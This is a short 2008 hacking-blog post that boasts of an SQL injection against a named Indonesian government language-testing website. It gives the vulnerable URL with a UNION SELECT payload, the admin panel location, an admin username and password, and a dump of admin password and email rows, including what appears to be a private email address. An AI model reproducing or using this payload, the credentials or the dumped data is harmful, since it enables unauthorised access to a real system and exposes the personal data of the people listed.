viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Monday, October 13, 2008

[SQLi] http://ukbi.pusatbahasa.diknas.go.id

5:55 PM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0 and instinct ^^
Admin loc --> http://ukbi.pusatbahasa.diknas.go.id/admin_ukbi.php
Admin usr:pwd --> ukbi:ukbi2007 (see more in above pic)
Dump:
[+] URL:http://ukbi.pusatbahasa.diknas.go.id/detail.php?id=29+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7--
[+] Evasion Used: "+" "--"
[+] 13:51:41
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: admukbi_ukbi
User: admukbi_ukbi@localhost
Version: 4.1.22-standard
[+] Dumping data from database "admukbi_ukbi" Table "admin"
[+] Column(s) ['password', 'email']
[+] Number of Rows: 3

[0] ukbi2007:loexman2003@yahoo.com:
[1] forumukbi:forum@ukbi.pusatbahasa.diknas.go.id:
[2] beritaukbi:berita@ukbi.pusatbahasa.diknas.go.id:

0 comments:

Post a Comment